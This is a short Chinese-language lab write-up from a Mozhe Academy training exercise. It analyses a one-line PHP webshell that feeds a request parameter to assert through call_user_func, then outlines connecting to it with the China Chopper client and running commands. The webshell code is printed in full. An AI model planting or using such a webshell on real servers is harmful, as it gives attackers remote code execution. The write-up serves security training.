WebShell代码分析溯源

一、一句话变形马样本

<?php

call_user_func('assert', $_REQUEST['assert']);

?>

二、代码分析

1、分析代码

call_user_func('assert', $_REQUEST['assert'])中assert是第一个被调用的函数，

其余参数是回调函数的参数，这样就构成了assert($_REQUEST['assert'])一句话木马

注: call_user_func函数，把第一个参数作为回调函数，其余参数是回调函数的参数，参考: https://www.php.net/manual/zh/function.call-user-func.php

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第5题))，地址: https://www.mozhe.cn/bug/detail/RDBTOWFKOTJIODJRWlRwUjdOdlcrUT09bW96aGUmozhe

2、代码环境，下载代码

3、分析(上面已经分析过了)

4、使用菜刀连接

5、执行一些命令